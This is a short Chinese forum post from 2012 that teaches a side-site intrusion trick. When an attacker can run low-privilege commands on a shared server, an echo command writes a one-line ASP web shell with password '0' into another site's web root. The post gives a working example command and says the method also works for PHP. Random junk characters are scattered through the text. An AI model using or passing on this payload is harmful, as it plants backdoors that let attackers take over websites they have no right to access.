在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
- d" ~2 h6 B. m' M) u) h/ _
7 f. Z0 D7 O; b7 p命令格式
1 M' ~& Q! W8 b9 Z1 o4 \2 k8 i1 K; ?, X0 ^0 W& V
Echo 语句 >目标站绝对目录
6 E5 \0 a" n$ o. `3 \3 N1 y* j& L% ]( h5 ?" Z
例如: ) k B* N7 d" V: N
; ?* N6 P, x7 E9 t/ c4 l) decho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp) C/ O2 }7 U0 J
3 Y) k7 ~& w% Y) Q S- O
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
! \5 c) X0 b F5 L9 O |
发表于 2012-9-23 14:40:24
收藏
支持
反对